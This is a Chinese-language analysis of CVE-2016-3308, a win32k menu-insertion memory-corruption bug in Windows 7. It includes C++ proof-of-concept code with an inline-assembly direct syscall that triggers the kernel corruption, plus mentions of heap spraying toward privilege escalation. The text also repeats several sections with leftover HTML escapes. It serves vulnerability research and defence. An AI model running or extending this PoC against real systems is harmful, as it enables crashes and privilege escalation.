CVE-2016-3308漏洞分析与研究<\/h1>

漏洞概述<\/h2>
CVE-2016-3308是Windows图形设备接口(GDI)中的一个漏洞，存在于`win32k!xxxInsertMenuItem<\/code>函数中。该漏洞属于内存破坏类型，可能导致权限提升或系统崩溃。漏洞影响Windows 7 x86 SP1系统。<\/p>`

漏洞原理<\/h2>
核心问题<\/h3>
漏洞的根本原因在于xxxInsertMenuItem<\/code>函数中两次调用MNLookUpItem<\/code>函数时存在不一致性，导致获取的菜单项指针可能指向错误的菜单层级，从而在后续内存操作中造成越界写入。<\/p>
关键函数分析<\/h3>
MNLookUpItem函数<\/h4>
PITEM MNLookUpItem(
<\/span><\/span>    PMENU pMenu,        \/\/ 从哪个菜单开始查找
<\/span><\/span><\/span><\/span>    UINT wCmd,          \/\/ ID(0)或index(1)
<\/span><\/span><\/span><\/span>    BOOL fByPosition,   \/\/ 如果是FALSE，以index方式进行查找
<\/span><\/span><\/span><\/span>    PMENU *<\/span>ppMenuItemIsOn)  \/\/ 返回在哪一个菜单找到的
<\/span><\/span><\/span><\/code><\/pre>该函数用于查找菜单项，有两种查找模式：<\/p>

按位置查找<\/strong>：当fByPosition<\/code>为TRUE时，直接通过数组索引获取菜单项<\/li>
按ID查找<\/strong>：当fByPosition<\/code>为FALSE时，递归查找匹配ID的菜单项<\/li>
<\/ol>
xxxInsertMenuItem函数<\/h4>
BOOL xxxInsertMenuItem(
<\/span><\/span>    PMENU pMenu,        \/\/ 进行插入操作的Menu对象指针
<\/span><\/span><\/span><\/span>    UINT wIndex,        \/\/ 选择在哪个位置进行插入操作
<\/span><\/span><\/span><\/span>    BOOL fByPosition,   \/\/ 根据Index还是根据ID
<\/span><\/span><\/span><\/span>    LPMENUITEMINFOW lpmii,  \/\/ 需要插入的信息
<\/span><\/span><\/span><\/span>    PUNICODE_STRING pstrItem)  \/\/ 菜单项文字内容(未逆向)
<\/span><\/span><\/span><\/code><\/pre>该函数用于在菜单中插入新项，主要流程：<\/p>

查找插入位置<\/li>
必要时重新分配内存<\/li>
移动现有项腾出空间<\/li>
插入新项<\/li>
<\/ol>
漏洞触发流程<\/h3>

第一次调用MNLookUpItem<\/code>查找插入位置<\/li>
如果菜单项数超过分配数(cItems >= cAlloced<\/code>)，重新分配内存<\/li>
第二次调用MNLookUpItem<\/code>查找插入位置<\/li>
执行memmove<\/code>移动菜单项<\/li>
<\/ol>
漏洞关键点<\/strong>：<\/p>

第二次调用MNLookUpItem<\/code>可能返回子菜单中的项<\/li>
但memmove<\/code>计算移动大小时使用的是父菜单的rgItems<\/code>作为基址<\/li>
导致基于错误基址计算移动大小，造成内存破坏<\/li>
<\/ul>
触发条件<\/h2>


构造一个菜单结构，其中：<\/p>

主菜单有多个子菜单<\/li>
子菜单的子菜单中包含wID为1的项<\/li>
子菜单的第一项设置hbmp<\/code>为MENUHBM_SYSTEM<\/code>(值为1)<\/li>
<\/ul>
<\/li>

通过以下操作触发：<\/p>

插入足够多的菜单项使需要重新分配内存<\/li>
指定wIndex为子菜单第一项的wID<\/li>
设置fByPosition为FALSE<\/li>
<\/ul>
<\/li>
<\/ol>
POC代码分析<\/h2>
#include<\/span> <iostream><\/span>
<\/span><\/span><\/span>#include<\/span> <Windows.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>typedef<\/span> struct<\/span> _UNICODE_STRING<\/span> {
<\/span><\/span>    USHORT Length;
<\/span><\/span>    USHORT MaximumLength;
<\/span><\/span>    PWSTR  Buffer;
<\/span><\/span>} UNICODE_STRING, *<\/span>PUNICODE_STRING;
<\/span><\/span>
<\/span><\/span>HMENU hMenu =<\/span> NULL;
<\/span><\/span>
<\/span><\/span>\/\/ 使用系统调用直接调用NtUserThunkedMenuItemInfo
<\/span><\/span><\/span><\/span>_declspec(naked<\/span>) BOOL NtUserThunkedMenuItemInfo(...)
<\/span><\/span>{
<\/span><\/span>    __asm<\/span> {
<\/span><\/span>        mov     eax, 1256<\/span>h
<\/span><\/span>        mov     edx, 7ff<\/span>e0300h
<\/span><\/span>        call    dword ptr[edx]
<\/span><\/span>        ret     18<\/span>h
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>()
<\/span><\/span>{
<\/span><\/span>    HMENU hMenu =<\/span> CreateMenu();
<\/span><\/span>    HMENU hmenuPopup =<\/span> CreateMenu();
<\/span><\/span>    MENUITEMINFO mii =<\/span> {};
<\/span><\/span>
<\/span><\/span>    \/\/ 构造特殊菜单结构
<\/span><\/span><\/span><\/span>    for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> 0xF<\/span>; i++<\/span>) {
<\/span><\/span>        mii.cbSize =<\/span> sizeof<\/span>(MENUITEMINFO);
<\/span><\/span>        mii.fMask =<\/span> MIIM_ID |<\/span> MIIM_DATA |<\/span> MIIM_SUBMENU |<\/span> MIIM_BITMAP;
<\/span><\/span>        mii.wID =<\/span> (i ==<\/span> 6<\/span> ?<\/span> 1<\/span> :<\/span> 0x100<\/span> +<\/span> i);  \/\/ 第6项设置wID为1
<\/span><\/span><\/span><\/span>        mii.hSubMenu =<\/span> (i ==<\/span> 0xE<\/span> ?<\/span> hmenuPopup : NULL);
<\/span><\/span>        mii.hbmpItem =<\/span> (i==<\/span>7<\/span> ?<\/span> (HBITMAP)1<\/span>:<\/span>NULL);  \/\/ 第7项设置hbmp为1
<\/span><\/span><\/span><\/span>        InsertMenuItem(i <<\/span> 7<\/span> ?<\/span> hmenuPopup : hMenu, i <<\/span> 7<\/span> ?<\/span> i : i -<\/span> 7<\/span>, TRUE, &<\/span>mii);
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    try<\/span> {
<\/span><\/span>        \/\/ 触发漏洞
<\/span><\/span><\/span><\/span>        NtUserThunkedMenuItemInfo(hMenu, 0x107<\/span>, FALSE, TRUE, (LPMENUITEMINFOW)&<\/span>mii, NULL, 0<\/span>);
<\/span><\/span>    } catch<\/span> (const<\/span> char<\/span>*<\/span> msg) {
<\/span><\/span>        std::<\/span>cerr <<<\/span> msg <<<\/span> std::<\/span>endl;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用<\/h2>

可能需要多次运行才能触发，因为破坏的内存可能不重要<\/li>
可通过堆喷技术控制破坏的内存区域<\/li>
最终可能导致权限提升或系统崩溃<\/li>
<\/ol>
防御措施<\/h2>
微软已发布补丁修复此漏洞，建议：<\/p>

及时安装安全更新<\/li>
对用户模式调用GDI函数进行严格验证<\/li>
实现适当的沙箱机制限制此类漏洞的影响<\/li>
<\/ol>
研究意义<\/h2>

展示了Windows内核组件中的递归查找与内存管理交互可能导致的漏洞<\/li>
强调了在重新分配内存后必须重新验证所有相关指针的重要性<\/li>
为理解菜单管理组件的安全性提供了案例<\/li>
<\/ol>
相关资源<\/h2>

55-AA-CVE-2016-3308<\/a><\/li>
An Analysis of MS16-098 \/ ZDI-16-453<\/a><\/li>
From CVE-2017-0263 to the Menu Management Component<\/a><\/li>
<\/ol>

CVE-2016-3308漏洞分析与研究<\/h1>

漏洞概述<\/h2> CVE-2016-3308是Windows图形设备接口(GDI)中的一个漏洞，存在于win32k!xxxInsertMenuItem<\/code>函数中。该漏洞属于内存破坏类型，可能导致权限提升或系统崩溃。漏洞影响Windows 7 x86 SP1系统。<\/p>

核心问题<\/h3> 漏洞的根本原因在于xxxInsertMenuItem<\/code>函数中两次调用MNLookUpItem<\/code>函数时存在不一致性，导致获取的菜单项指针可能指向错误的菜单层级，从而在后续内存操作中造成越界写入。<\/p>

相关资源<\/h2> 55-AA-CVE-2016-3308<\/a><\/li> An Analysis of MS16-098 \/ ZDI-16-453<\/a><\/li> From CVE-2017-0263 to the Menu Management Component<\/a><\/li> <\/ol>

漏洞概述<\/h2>
CVE-2016-3308是Windows图形设备接口(GDI)中的一个漏洞，存在于`win32k!xxxInsertMenuItem<\/code>函数中。该漏洞属于内存破坏类型，可能导致权限提升或系统崩溃。漏洞影响Windows 7 x86 SP1系统。<\/p>`

核心问题<\/h3>
漏洞的根本原因在于`xxxInsertMenuItem<\/code>函数中两次调用MNLookUpItem<\/code>函数时存在不一致性，导致获取的菜单项指针可能指向错误的菜单层级，从而在后续内存操作中造成越界写入。<\/p>`

相关资源<\/h2>

55-AA-CVE-2016-3308<\/a><\/li>
An Analysis of MS16-098 \/ ZDI-16-453<\/a><\/li>
From CVE-2017-0263 to the Menu Management Component<\/a><\/li> <\/ol>